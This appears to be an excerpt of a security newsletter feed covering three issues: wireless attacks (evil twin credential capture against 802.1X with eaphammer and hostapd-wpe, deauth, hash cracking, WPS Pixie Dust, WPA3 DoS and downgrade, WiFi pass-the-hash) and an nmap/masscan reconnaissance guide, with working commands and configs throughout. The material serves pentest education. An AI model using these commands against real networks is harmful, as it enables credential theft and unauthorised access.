7. Inner authentication happens inside tunnel (MSCHAPv2, GTC, etc)
8. RADIUS sends Access-Accept or Access-Reject to AP
9. AP grants or denies network access
```

This architecture has a fundamental flaw: the access point blindly forwards EAP frames. It doesn&apos;t validate that the RADIUS server is legitimate. This enables **Evil Twin attacks** where an attacker presents a fake AP, and if clients don&apos;t enforce certificate validation, they connect automatically and leak credentials.

## 🔐 EAP Authentication Methods

EAP (Extensible Authentication Protocol, RFC 3748) supports multiple authentication mechanisms. Each has different security properties and attack surfaces.

### PEAP (Protected EAP)

Most common in corporate environments. Establishes a TLS tunnel between client and RADIUS server, then performs inner authentication inside the tunnel.

**PEAP+MSCHAPv2** is the standard configuration. Client sends username/password. Server responds with challenge. Client computes response using NT hash of password. This challenge/response is **NetNTLMv1**, which can be captured and cracked offline.

The TLS tunnel protects credentials from passive eavesdropping but does nothing against active Evil Twin attacks if the client doesn&apos;t validate the server certificate.

### EAP-TTLS (Tunneled TLS)

Similar to PEAP but more flexible. Supports more inner authentication methods including PAP (plaintext passwords inside tunnel), CHAP, MSCHAPv2, and EAP-based methods.

**EAP-TTLS+PAP** is dangerously common. Organizations deploy it for legacy device compatibility. If you can get a client to connect to your fake AP, you capture plaintext credentials.

### EAP-TLS

The most secure option. Mutual certificate-based authentication. Both client and server present certificates. No passwords transmitted.

If an enterprise network uses EAP-TLS exclusively with proper certificate validation, you&apos;re not capturing credentials through Evil Twin attacks. You&apos;ll need to pivot to other vectors (physical access to extract client certs, social engineering, etc).

### Legacy Methods

**PAP (Password Authentication Protocol)** - Transmits passwords in cleartext. Only acceptable inside a TLS tunnel (TTLS+PAP). If deployed without tunneling, credentials are immediately compromised.

**CHAP (Challenge-Handshake Authentication Protocol)** - Uses MD5 challenge/response. Weak cryptography, vulnerable to offline cracking.

**EAP-MD5** - Legacy EAP method with simple MD5 challenge/response. No mutual authentication. No session key derivation. Completely broken. Credentials can be captured and cracked offline.

If you discover PAP, CHAP, or EAP-MD5 enabled on an enterprise network, that&apos;s a **critical finding**.

## 🔍 Reconnaissance Phase

Before attacking, understand the target network&apos;s configuration.

### Capture EAP Identities

User identities are transmitted during EAP authentication. These follow specific formats:

- **User Principal Name**: `user@domain.com`
- **Domain\User**: `DOMAIN\username`
- **SAMAccountName**: `username`
- **Email**: `email@domain.com`
- **Anonymous**: `anonymous@domain.com`

```bash
# Start capture on target network
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
```

Analyze with Wireshark:

```
eap &amp;&amp; eap.identity
```

You&apos;ll see identity formats and potentially extract valid usernames for further attacks.

### Extract AP Certificate

The access point presents a server certificate during TLS tunnel establishment. You need certificate details to create a convincing fake AP.

**Wireshark filter:**

```
eap &amp;&amp; tls.handshake.certificate
```

Look for:
- **Subject**: Server hostname
- **Issuer**: Certificate Authority
- **Validity period**
- **Subject Alternative Names (SANs)**

The more closely your fake certificate resembles the legitimate one, the more likely clients will connect automatically (if they&apos;re not enforcing CA validation, which many aren&apos;t).

### Detect Supported EAP Methods

Once you have a valid username, test which EAP methods the RADIUS server supports.

**EAP_buster tool:**

```bash
# Clone
git clone https://github.com/blackarrowsec/EAP_buster
cd EAP_buster

# Test methods (adapter in managed mode)
bash ./EAP_buster.sh &apos;wlan0&apos; &apos;username@domain.com&apos;
```

This probes the RADIUS server with different EAP method requests. Output shows which methods are accepted (PEAP, TTLS, TLS, MD5, etc).

If you see PAP, CHAP, or EAP-MD5 accepted, prioritize those for credential capture.

## 💀 Attack 1: Credential Capture with Evil Twin

The most practical enterprise WiFi attack. Set up a fake access point that mimics the legitimate network. When clients connect, capture authentication credentials.

**Prerequisites:**
- Valid SSID
- Target channel
- Certificate details (from recon phase)
- Tool: `hostapd-wpe` or `eaphammer`

### Using eaphammer

[eaphammer](https://github.com/s0lst1c3/eaphammer) automates the entire attack workflow.

**Step 1: Create certificates**

```bash
# Clone and setup
git clone https://github.com/s0lst1c3/eaphammer
cd eaphammer

# Certificate wizard
python3 ./eaphammer --cert-wizard
```

Answer prompts with details extracted from legitimate AP certificate. The closer the match, the better.

**Step 2: Launch Evil Twin**

```bash
# Adapter must be in managed mode
# eaphammer will switch it to master mode automatically

python3 ./eaphammer -i wlan0 \
  --auth wpa-eap \
  --essid &apos;CorporateWiFi&apos; \
  --creds
```

This creates a fake AP with SSID &quot;CorporateWiFi&quot; and starts capturing credentials.

**Step 3: Deauth legitimate clients (on second adapter)**

```bash
# On second adapter in monitor mode
# Tune to target channel
sudo iw dev wlan1mon set channel 6

# Deauth attack
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF --ignore-negative-one wlan1mon
```

Clients disconnect from real AP and reconnect. If their configuration doesn&apos;t enforce proper certificate validation, they connect to your fake AP automatically.

**Step 4: Captured credentials**

eaphammer outputs captured hashes in real-time:

```
[CREDS] username: jsmith@corp.com
[CREDS] NetNTLMv1 Challenge: 5c2b6f3a7d8e9f1c
[CREDS] NetNTLMv1 Response: a7d8e9f1c2b3a4f5...
```

These NetNTLMv1 hashes can be cracked offline with Hashcat or John the Ripper.

### Using hostapd-wpe

[hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) is the alternative. More manual but works reliably.

**Configuration file** (`hostapd-wpe.conf`):

```
interface=wlan0
driver=nl80211
ssid=CorporateWiFi
channel=6
hw_mode=g

wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
auth_algs=3

ieee8021x=1
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/certs/dh
```

**EAP user file** (`hostapd.eap_user`):

```
*     PEAP,TTLS,TLS,FAST
&quot;t&quot;   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC   &quot;t&quot;   [2]
```

This accepts any username and enables all methods.

**Launch:**

```bash
sudo hostapd-wpe hostapd-wpe.conf
```

Captured hashes are logged to console and `hostapd-wpe.log`.

### Cracking NetNTLMv1 Hashes

**Hashcat (GPU-accelerated):**

```bash
# Hashcat mode 5500 for NetNTLMv1
hashcat -m 5500 -a 0 hashes.txt wordlist.txt

# With rules for better coverage
hashcat -m 5500 -a 0 hashes.txt wordlist.txt -r rules/best64.rule
```

**John the Ripper:**

```bash
john --format=netntlm-naive --wordlist=wordlist.txt hashes.txt
```

NetNTLMv1 is significantly faster to crack than NetNTLMv2. Weak passwords fall within minutes.

## 🔓 Attack 2: Legacy Method Exploitation

If the network supports PAP, CHAP, or EAP-MD5, exploitation is straightforward.

### EAP-MD5 Credential Capture

EAP-MD5 uses simple MD5 challenge/response without tunneling. Capture the exchange and crack offline.

**Capture with Wireshark:**

```
eap &amp;&amp; eap.type == 4
```

Extract:
- **Identity** (username)
- **Challenge** (MD5 challenge value)
- **Response** (MD5 response value)

**Example from pcap:**

```
Identity: jsmith
Challenge (hex): 5c2b6f3a7d8e9f1c2a3b4c5d6e7f8091
Response (hex): a7d8e9f1c2b3a4f5c6d7e8f90a1b2c3d
```

### Cracking EAP-MD5 with eapmd5pass

```bash
# Format challenge and response with colons
CHALLENGE=$(echo &quot;5c2b6f3a7d8e9f1c2a3b4c5d6e7f8091&quot; | sed &apos;s/\(..\)/\1:/g;s/:$//&apos;)
RESPONSE=$(echo &quot;a7d8e9f1c2b3a4f5c6d7e8f90a1b2c3d&quot; | sed &apos;s/\(..\)/\1:/g;s/:$//&apos;)

# Crack with dictionary
eapmd5pass -w wordlist.txt -E jsmith -C &quot;$CHALLENGE&quot; -R &quot;$RESPONSE&quot;
```

### Alternative: hcxpcapngtool + Hashcat

```bash
# Convert capture to Hashcat format
hcxpcapngtool --eapmd5=eapmd5.hash capture.cap

# Crack with Hashcat mode 4800
hashcat -m 4800 -a 0 eapmd5.hash wordlist.txt
```

### TTLS+PAP Plaintext Capture

If the network supports TTLS+PAP and clients don&apos;t validate server certificates, you capture plaintext passwords.

**eaphammer captures automatically:**

```bash
python3 ./eaphammer -i wlan0 --auth wpa-eap --essid &apos;CorporateWiFi&apos; --creds
```

When a client connects using TTLS+PAP, eaphammer logs:

```
[CREDS] username: jsmith@corp.com
[CREDS] password: Summer2024!
```

No cracking needed. Direct cleartext credentials.

## 🔑 Pass-the-Hash in Enterprise WiFi

Once you&apos;ve captured NetNTLMv1 hashes, you can use them directly without cracking.

**wpa_supplicant supports NT hash authentication:**

```bash
# Generate NT hash from password (for testing)
echo -n &quot;Password123!&quot; | iconv -t UTF16LE | openssl dgst -md4 -provider legacy
```

Output: `8846f7eaee8fb117ad06bdd830b7586c`

**Configuration file:**

```
network={
    ssid=&quot;CorporateWiFi&quot;
    key_mgmt=WPA-EAP
    eap=PEAP
    identity=&quot;jsmith@corp.com&quot;
    password=hash:8846f7eaee8fb117ad06bdd830b7586c  # NT hash
    phase1=&quot;peapver=0&quot;
    phase2=&quot;auth=MSCHAPV2&quot;
}
```

**Connect:**

```bash
wpa_supplicant -D nl80211 -i wlan0 -c corp.conf
```

You&apos;re authenticated using the hash. No need to crack the plaintext password.

This is particularly useful when you&apos;ve captured hashes but cracking is taking too long. Authenticate immediately with the hash.

## 🎯 Key Takeaways

Enterprise WiFi security depends entirely on proper configuration. 802.1X with RADIUS provides strong authentication architecture, but organizations consistently misconfigure it.

The most common failure is not enforcing certificate validation on clients. This single misconfiguration enables all Evil Twin attacks. Clients connect to fake access points automatically, leaking credentials.

PEAP+MSCHAPv2 is the most deployed enterprise method and remains vulnerable to credential capture. NetNTLMv1 hashes can be cracked offline or used directly via Pass-the-Hash.

Legacy methods (PAP, CHAP, EAP-MD5) should never be deployed. If you find them during an assessment, that&apos;s a critical finding. Credentials are either plaintext or trivially crackable.

Reconnaissance is essential. Extract EAP identities to understand username formats. Capture AP certificates to create convincing fake APs. Test supported EAP methods with EAP_buster to identify the weakest path.

eaphammer and hostapd-wpe are your primary tools. Both capture credentials automatically. eaphammer is more automated, hostapd-wpe gives you more control.

Pass-the-Hash works in enterprise WiFi. You don&apos;t always need to crack captured hashes. Use them directly in wpa_supplicant configuration.

---

That&apos;s it for Part 3!

We&apos;ve covered the fundamentals of enterprise WiFi exploitation: architecture, authentication methods, reconnaissance, credential capture, legacy method attacks, and Pass-the-Hash.

Part 4 (next week) will dive into advanced techniques: PEAP relay attacks (real-time credential relaying without cracking), ESSID stripping for WIDS bypass, comprehensive defensive mitigations, and practice lab setup.

These attacks work because organizations prioritize compatibility and ease of deployment over security. Test them on your own lab first. Set up a Raspberry Pi with FreeRADIUS and hostapd. Practice the techniques until you understand the 802.1X flow completely.

Thanks for reading, and happy hunting!

— Ruben</content:encoded><category>Newsletter</category><category>wireless-security</category><author>Ruben Santos</author></item><item><title>WiFi Hacking 101: WPA/WPA2 Cracking, PMKID, and WPS (Part 2)</title><link>https://www.kayssel.com/newsletter/issue-37</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-37</guid><description>From 4-way handshake capture to offline cracking: WPA/WPA2 attacks, PMKID exploitation, WPS vulnerabilities, and what WPA3 actually protects against</description><pubDate>Sun, 15 Feb 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Welcome back. Part 1 covered the fundamentals: hardware, monitor mode, packet injection, deauth attacks, and basic Wireshark analysis. If you haven&apos;t read it, [start there first](/newsletter/issue-35).

Now we get to the actual attacks against encrypted networks.

WPA/WPA2 is still the dominant standard in homes and small businesses worldwide. WPS is still enabled by default on millions of routers shipped today. WPA3 is the &quot;secure&quot; successor, and it has its own problems. This issue covers all of it.

Let&apos;s keep breaking WiFi 👇

## 🤝 WPA/WPA2: The 4-Way Handshake

To understand why WPA/WPA2 cracking works, you need to understand the 4-way handshake. This is the authentication sequence that runs every time a client connects to a network.

Here&apos;s what happens:

1. **AP sends ANonce** (random nonce generated by the access point)
2. **Client generates SNonce**, computes the PTK from the PMK (derived from the PSK + SSID via PBKDF2-SHA1), the ANonce, SNonce, and both MAC addresses. Sends back the SNonce with a MIC.
3. **AP derives the same PTK**, sends the Group Temporal Key (GTK) encrypted with the PTK, protected with a MIC.
4. **Client acknowledges**. Secure session established.

The critical detail is step 2. The PMK is derived from the PSK (your WiFi password) using PBKDF2-SHA1. If you capture the 4-way handshake, you have everything you need to run an offline dictionary attack. No rate limiting. No lockouts. Just you, a wordlist, and GPU time.

The security of WPA2-PSK is entirely dependent on passphrase strength.

### Capturing the Handshake

You have two options: passive or active.

**Passive capture**: Start airodump-ng targeting the network and wait. When a client connects naturally, you capture the handshake. No interaction with the AP, no detection risk.

**Active capture**: Deauth a connected client, force them to reconnect, and capture the handshake. Faster, but the deauth frames may trigger a WIDS (Wireless Intrusion Detection System).

```bash
# Step 1: Identify the target network and channel
sudo airodump-ng wlan0mon

# Step 2: Start capturing, focused on target
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Step 3 (active): Deauth a connected client to force reconnect
# Run this in a second terminal while airodump-ng is still running
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# When handshake is captured, airodump-ng shows:
# WPA handshake: AA:BB:CC:DD:EE:FF
```

Verify your capture before moving to cracking:

```bash
# Check if the capture contains a valid handshake
aircrack-ng handshake-01.cap
```

### Offline Cracking

Two main options: aircrack-ng (CPU, slow) or hashcat (GPU, fast). Use hashcat. Your GPU is 10-100x faster than your CPU for this task.

**Important**: The old hashcat mode `-m 2500` is deprecated. Modern captures use `-m 22000`, which handles both handshakes and PMKID in the same format.

```bash
# aircrack-ng (CPU, simpler)
aircrack-ng -w /path/to/wordlist.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap

# Convert capture for hashcat (requires hcxtools)
hcxpcapngtool -o hashes.hc22000 handshake-01.cap

# hashcat (GPU, recommended)
hashcat -m 22000 -a 0 hashes.hc22000 /path/to/wordlist.txt

# With rules (much more effective than raw wordlist)
hashcat -m 22000 -a 0 hashes.hc22000 /path/to/wordlist.txt -r /usr/share/hashcat/rules/best64.rule
```

Good wordlists: [rockyou.txt](https://github.com/danielmiessler/SecLists/tree/master/Passwords) as a baseline, then domain-specific wordlists from [SecLists](https://github.com/danielmiessler/SecLists). Target company names, location names, and years in your custom wordlists. Most people use variations of their company or address.

### The Evil Twin Attack

If the password resists cracking, there&apos;s another path. The Evil Twin attack sets up a fake AP with the same SSID, continuously deauths clients from the real AP, and presents a captive portal asking users to &quot;re-enter their WiFi password.&quot;

[airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) automates this entirely. It handles the fake AP setup, DHCP, DNS, captive portal hosting, and continuous DoS against the legitimate network.

The key detail: airgeddon uses the captured handshake or PMKID to validate the password the victim enters in the portal. It only reports success when the submitted password matches the real one. No false positives.

This attack is social engineering via RF. It works especially well against users who see a &quot;network update required&quot; portal and don&apos;t question it.

## 🎯 PMKID: Clientless WPA2 Cracking

In 2018, the [Hashcat](https://hashcat.net/hashcat/) team disclosed a new attack. It changed WiFi cracking fundamentally.

The PMKID is a value computed by the AP during fast roaming:

```
PMKID = HMAC-SHA1-128(PMK, &quot;PMK Name&quot; || AP_MAC || STA_MAC)
```

The PMK is derived directly from the PSK (your password) and SSID. The AP MAC and STA MAC are known. If you can extract the PMKID, you have everything needed for an offline dictionary attack.

The game-changing part: **you don&apos;t need a client to be connected**.

Classic handshake capture requires waiting for (or forcing) a client to connect. PMKID extraction triggers on the AP directly by sending an authentication packet. One packet out, PMKID back.

A quick caveat: PMKID extraction is not fully passive. You send one auth packet to the AP, which triggers it to include the PMKID in its response. Most networks with vulnerable implementations respond. It doesn&apos;t require 802.11r/Fast Transition networks, despite what some guides claim. Many standard WPA/WPA2 APs expose PMKIDs regardless.

### Capturing and Cracking PMKID

[hcxdumptool](https://github.com/ZerBea/hcxdumptool) is the tool for this. The commands below are for hcxdumptool &gt;= 6.3.0.

```bash
# Step 1: Create a BPF filter to target a specific AP (optional but cleaner)
tcpdump -i wlan0mon wlan addr3 AA:BB:CC:DD:EE:FF -ddd &gt; bpf_filter.bpf

# Step 2: Capture with hcxdumptool
# -c 6a = channel 6, &apos;a&apos; = 2.4GHz band modifier
# --rds=1 = enable PMKID capture
hcxdumptool -i wlan0mon -c 6a --rds=1 --bpf=bpf_filter.bpf -w pmkid_capture.pcapng

# Let it run for 30-60 seconds, then Ctrl+C

# Step 3: Convert to hashcat format
hcxpcapngtool -o hashes.hc22000 pmkid_capture.pcapng

# Step 4: Crack with hashcat (same mode as handshake, -m 22000)
hashcat -m 22000 -a 0 hashes.hc22000 /path/to/wordlist.txt
```

To verify your capture contains a PMKID in Wireshark, use this filter:

```
wlan.rsn.ie.data_type == 4
```

You can also do a quick sanity check with aircrack-ng:

```bash
aircrack-ng pmkid_capture.pcapng
# Should show: &quot;WPA (1 handshake, with PMKID)&quot; or similar
```

Both handshakes and PMKIDs use `-m 22000` in hashcat. hcxpcapngtool outputs both in the same file. One crack session handles everything.

The PMKID attack dramatically reduces the time needed on-site. In many assessments, you can walk past a network, trigger PMKID capture in under a minute, and crack the password at your desk later. No waiting for clients to connect. No noisy deauths.

## 🔓 WPS: Still Enabled, Still Broken

Wi-Fi Protected Setup was introduced in 2007 to make connecting devices easier. Instead of typing a complex password, users press a button or enter an 8-digit PIN.

The PIN method is broken by design. The 8-digit PIN isn&apos;t validated as a single unit. The AP validates the first four digits and second four digits separately, and the last digit is a checksum. This reduces the brute-force space from 100,000,000 combinations to approximately 11,000.

Eleven thousand guesses. On a protocol with no lockout in many implementations.

### Three Ways to Attack WPS

**1. Pixie Dust**

The most devastating WPS attack. Some AP implementations generate weak random numbers for the WPS exchange (specifically E-S1 and E-S2 nonces). Pixie Dust exploits this weak randomization to recover the PIN nearly instantly, without brute-forcing anything. Works offline once you capture a single WPS exchange attempt.

```bash
# Reaver with Pixie Dust
# Note: use legacy interface names (wlan0, wlan1) not PNIN names like wlx00c0ca9208dc
# Use -5 flag if target is on 5GHz band
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1 -N -vvv
```

If the chipset is vulnerable, you&apos;ll have the PIN (and therefore the WPA password) in seconds.

**2. Null PIN**

Some vendor implementations have a bug where sending an empty PIN string causes the AP to disclose the WPA password. This is a code quality failure, not a protocol flaw.

```bash
# Reaver Null PIN attempt
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -L -f -N -g 1 -d 2 -vvv -p &apos;&apos;
```

**3. Brute-Force**

Classic WPS PIN brute-force. With ~11,000 effective combinations and no lockout on vulnerable APs, this is feasible. It&apos;s slow (several hours in the worst case) but reliable against targets where Pixie Dust doesn&apos;t apply.

```bash
# Reaver brute-force
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -L -f -N -d 2 -vvv

# Bully brute-force (alternative tool)
bully wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -S -L -F -B -v 2
```

**4. Known PINs**

Many routers ship with default or algorithmically predictable WPS PINs. `12345670` is a default on a surprising number of devices. Tools like Reaver can check known PINs before brute-forcing.

### What to Check in an Assessment

WPS is often enabled by default and forgotten. Check every AP for WPS status:

```bash
# airodump-ng shows WPS in the output
sudo airodump-ng wlan0mon
# Look for &quot;WPS&quot; in the output columns

# Wash scans specifically for WPS-enabled networks
sudo wash -i wlan0mon
```

A note on tooling: [Bully](https://github.com/aanarchyy/bully) development has stalled. Reaver ([t6x fork](https://github.com/t6x/reaver-wps-fork-t6x)) is actively maintained. Use Reaver as your primary WPS tool.

One more note: Reaver requires legacy interface naming (wlan0, wlan1). If your system uses predictable network interface names like `wlx00c0ca9208dc`, you may need to rename the interface or configure your system for legacy names before Reaver works correctly.

## 🐉 WPA3: Better, Not Bulletproof

WPA3 launched in 2018 as the answer to WPA2&apos;s weaknesses. The core improvement is SAE (Simultaneous Authentication of Equals), based on Dragonfly key exchange.

SAE solves the fundamental WPA2 problem: **captured handshakes are useless for offline cracking**. Each session derives a unique PMK. No handshake, no offline attack. This is proper forward secrecy.

WPA3 also enables Management Frame Protection by default, which kills deauth-based attacks against WPA3-only networks.

In 2019, Mathy Vanhoef and Eyal Ronen published the [Dragonblood attacks](https://wpa3.mathyvanhoef.com/). SAE had timing and cache-based side-channel vulnerabilities that allowed partial key recovery. Downgrade attacks could force clients back to WPA2. DoS attacks could crash or overwhelm APs.

Most of these were patched through firmware updates. Modern WPA3 implementations are significantly more hardened. But two attack paths remain relevant.

### Dragon Drain: DoS Against WPA3

SAE authentication (the Dragonfly handshake) is computationally expensive. An attacker floods the AP with SAE commit messages, exhausting its processing resources. The AP slows down or becomes unavailable.

The original Dragon Drain PoC only works with Atheros chipsets. The [airgeddon Dragon Drain plugin](https://github.com/Janek79ax/dragon-drain-wpa3-airgeddon-plugin) bypasses this limitation and works with any compatible chipset.

This attack takes several minutes before the impact becomes visible. On some devices, it triggers a reboot. It&apos;s a useful DoS primitive in environments where you need to disrupt WPA3 connectivity without relying on deauth frames.

### Online Dictionary Attack Against WPA3-SAE

SAE blocks offline cracking. But it doesn&apos;t block online guessing.

You repeatedly initiate SAE authentication exchanges against the AP, trying one password per full exchange. It&apos;s painfully slow, around 50 words per second. Compared to hashcat cracking WPA2 hashes at millions of attempts per second, this is a crawl.

But it works. On weak passwords, it works.

The [Wacker script](https://github.com/blunderbuss-wctf/wacker) and the [airgeddon WPA3 online dictionary plugin](https://github.com/OscarAkaElvis/airgeddon-plugins) automate this. airgeddon ships a statically compiled patched wpa_supplicant for multiple architectures, so you don&apos;t need to build it yourself.

```bash
# airgeddon handles the WPA3 online dictionary attack via its plugin system
# It ships a patched wpa_supplicant and manages the SAE exchange loop
# Launch airgeddon and navigate to the WPA3 attack menu
sudo bash airgeddon.sh
```

This attack is loud. One full authentication per guess means lots of traffic, detectable by any WIDS. It may trigger account lockouts on more sophisticated AP implementations. Use this against targets where you have reason to believe the password is in your wordlist, and where detection risk is acceptable.

The takeaway on WPA3: it&apos;s meaningfully better than WPA2. Captured frames are useless for offline cracking. But &quot;better&quot; doesn&apos;t mean &quot;impervious.&quot; Weak passwords are still crackable online. DoS attacks still work. And most networks aren&apos;t running pure WPA3.

## 🔀 WPA2/3 Transitional: The Downgrade Problem

Here&apos;s the real-world situation. Network admins want WPA3 security, but they also have legacy devices that only support WPA2. The solution is transitional (mixed) mode: the AP advertises both WPA2-PSK and WPA3-SAE simultaneously, and clients connect with whichever they support.

This sounds reasonable. In practice, it inherits every WPA2 weakness.

The attack: force a WPA3-capable victim to connect via WPA2.

**How the downgrade works:**

1. Identify a transitional network (supporting both WPA2 and WPA3).
2. Set up a fake AP advertising only WPA2, same SSID.
3. Perform DoS against the legitimate AP.
4. The victim&apos;s device falls back to your fake WPA2 AP via its Preferred Network List (PNL).
5. Capture the WPA2 handshake. Even capturing half the handshake (messages 1 and 2 of 4) is sufficient for offline cracking.
6. Crack offline with hashcat as normal.

The downgrade succeeds if any WPA2 clients are visible on the network, or if WPA3 clients aren&apos;t enforcing MFP (which is common in transitional mode for compatibility reasons).

**Detecting transitional networks in Wireshark:**

```
wlan.rsn.akms.type == 2 &amp;&amp; wlan.rsn.akms.type == 8
```

This filter shows beacon frames that advertise both PSK (AKM type 2) and SAE (AKM type 8), which is the fingerprint of a transitional network.

The practical security posture of a transitional network is effectively WPA2. If you support WPA2, you&apos;re vulnerable to WPA2 attacks. The WPA3 component provides no meaningful protection against a downgrade-capable adversary.

## 🎯 Key Takeaways

**WPA/WPA2 handshake cracking** is offline and uncapped. Capture once, crack forever. Security is entirely passphrase-dependent. Use GPU cracking with hashcat `-m 22000`. Apply rule-based attacks, not just raw wordlists.

**PMKID** changed the game in 2018. Clientless extraction, same cracking workflow. One auth packet, walk away with the hash. No waiting for clients, no deauth noise.

**WPS is still everywhere.** Check every AP. Pixie Dust is instant on vulnerable chipsets. Null PIN works on some implementations. Brute-force is feasible at ~11,000 combinations. Known PIN databases catch the rest. Always check WPS status during wireless assessments.

**WPA3 solves the offline cracking problem.** SAE-derived PMKs make captured handshakes useless. But online dictionary attacks work (slowly). Dragon Drain can DoS WPA3 APs. And most networks aren&apos;t running pure WPA3.

**Transitional networks reduce to WPA2.** Downgrade attacks work when any WPA2 clients exist or when WPA3 clients don&apos;t enforce MFP. Mixed-mode networks inherit mixed-mode attack surface.

---

That&apos;s it for Part 2!

WPA2 is crackable if the password is weak. WPS is crackable in a lot of cases regardless of password strength. WPA3 raises the bar but doesn&apos;t eliminate attack paths. And transitional networks give you WPA3&apos;s branding with WPA2&apos;s weaknesses.

This series has one more issue left. Part 3 covers enterprise networks: WPA2-Enterprise (802.1X/MGT), RADIUS, PEAP/EAP-TLS configurations, relay attacks, ESSID stripping, and how to attack certificate-based authentication. Enterprise WiFi has a very different attack surface, and it shows up in almost every corporate engagement.

Thanks for reading, and happy hunting!

-- Ruben</content:encoded><category>Newsletter</category><category>wireless-security</category><author>Ruben Santos</author></item><item><title>Infrastructure Reconnaissance: Your First Steps in Network Pentesting</title><link>https://www.kayssel.com/newsletter/issue-36</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-36</guid><description>From nmap and nuclei to full infrastructure enumeration: a practical guide to discovering attack surface in bug bounty and pentesting</description><pubDate>Sun, 08 Feb 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Funny how this works. I&apos;ve spent months covering complex offensive security topics. Web3 signature exploitation, Active Directory attacks, Kubernetes escapes, deserialization chains. But somehow I never wrote about the absolute basics.

nmap. nuclei. Subdomain enumeration. The tools you literally use on day one of every infrastructure assessment or bug bounty program.

This is pentesting 101. The foundation everything else builds on. Whether you just landed your first infrastructure pentest, want to get into bug bounty, or need to refresh the fundamentals, this is where you start. You can&apos;t exploit an Active Directory environment if you can&apos;t enumerate the network. You can&apos;t find Web3 API vulnerabilities if you don&apos;t know how to discover endpoints.

And while the methodology hasn&apos;t changed, the tooling has evolved massively. Modern reconnaissance frameworks automate workflows that used to take days. Nuclei runs 10,000+ vulnerability templates in minutes. Subdomain enumeration now leverages certificate transparency and passive DNS datasets at scale.

This week we&apos;re covering the complete infrastructure reconnaissance workflow from zero. Port scanning with nmap, masscan, and rustscan. Vulnerability detection with nuclei. Subdomain enumeration strategies. SSL/TLS analysis. And how to chain everything into a systematic methodology you can use on your next engagement.

Let&apos;s build that attack surface map 👇

## 🎯 The Methodology

Infrastructure recon isn&apos;t about randomly running tools. You&apos;re building a complete picture of the attack surface, layer by layer.

**Phase 1: Network Discovery** - Find live hosts and open ports. This gives you the initial surface.

**Phase 2: Service Enumeration** - Extract versions, configurations, protocols. This reveals specific attack vectors.

**Phase 3: Vulnerability Scanning** - Map known CVEs to enumerated services.

**Phase 4: Subdomain Enumeration** - Expand the surface. Dev servers and staging environments are often less secured.

**Phase 5: SSL/TLS Analysis** - Test crypto configs. Weak ciphers and cert issues lead to MITM or info disclosure.

Each phase informs the next. Ports reveal services. Services reveal versions. Versions map to CVEs.

## 🔍 Port Scanning with nmap

[nmap](https://nmap.org/) is the standard. You&apos;re testing infrastructure? You&apos;re using nmap.

**Basic scans:**

```bash
# Top 1000 ports
nmap 10.0.0.1

# Specific ports
nmap -p 80,443,8080 10.0.0.1

# All ports
nmap -p- 10.0.0.1
```

**SYN scan (faster, stealthier):**

```bash
# Default for privileged users
sudo nmap -sS 10.0.0.1

# Skip ping (useful if ICMP blocked)
sudo nmap -Pn -sS 10.0.0.1
```

SYN scans don&apos;t complete the TCP handshake. Faster and less likely to trigger application logs.

**Service detection:**

```bash
# Detect versions
nmap -sV 10.0.0.1

# Aggressive detection
nmap -sV --version-intensity 9 10.0.0.1

# OS + version
sudo nmap -A 10.0.0.1
```

You need exact versions to map CVEs. `OpenSSH 7.2p2` has different vulns than `8.0p1`.

**Timing (speed vs stealth):**

```bash
# Slow and stealthy (IDS evasion)
nmap -T1 10.0.0.1

# Normal (default)
nmap -T3 10.0.0.1

# Aggressive (faster)
nmap -T4 10.0.0.1
```

Bug bounty and authorized tests? Use `-T4`. Red team where stealth matters? `-T1` or `-T2`.

**NSE scripts (the real power):**

nmap includes [600+ NSE scripts](https://nmap.org/nsedoc/) for vulnerability detection and advanced enumeration:

```bash
# Default scripts + version detection
nmap -sC -sV 10.0.0.1

# Specific script
nmap --script http-title 10.0.0.1

# All HTTP scripts
nmap --script &quot;http-*&quot; -p 80,443 10.0.0.1

# Vulnerability scripts
nmap --script vuln 10.0.0.1

# SMB enumeration
nmap --script smb-os-discovery,smb-enum-shares -p 445 10.0.0.1
```

NSE automates recon that would otherwise need manual testing. `http-title` grabs page titles. `smb-enum-shares` lists shares. `ssl-cert` extracts certificate SANs (great for subdomain discovery).

**Web server enumeration:**

```bash
# Comprehensive web enum
sudo nmap -Pn -sS -sV -p 80,443,8000-8443 \
  --script http-title,http-headers,ssl-cert \
  10.0.0.1
```

**Always save outputs:**

```bash
# All formats
nmap -oA scan 10.0.0.1
```

## ⚡ Speed Scanning

nmap is thorough but slow on large networks. [masscan](https://github.com/robertdavidgraham/masscan) trades thoroughness for raw speed.

```bash
# Scan all ports (very fast)
sudo masscan 10.0.0.1 -p0-65535 --rate 10000

# Common web ports across /24
sudo masscan 10.0.0.0/24 -p80,443,8080,8443 --rate 5000
```

masscan is stateless and asynchronous. Blazing fast but less accurate.

**Best workflow: masscan + nmap**

```bash
# Step 1: masscan finds ports
sudo masscan 10.0.0.0/24 -p0-65535 --rate 10000 -oL masscan.txt

# Step 2: nmap enumerates those specific ports
# Parse masscan output and feed to nmap
```

Combine masscan&apos;s speed with nmap&apos;s accuracy.

**rustscan alternative:**

[rustscan](https://github.com/RustScan/RustScan) is modern, fast, and pipes directly to nmap:

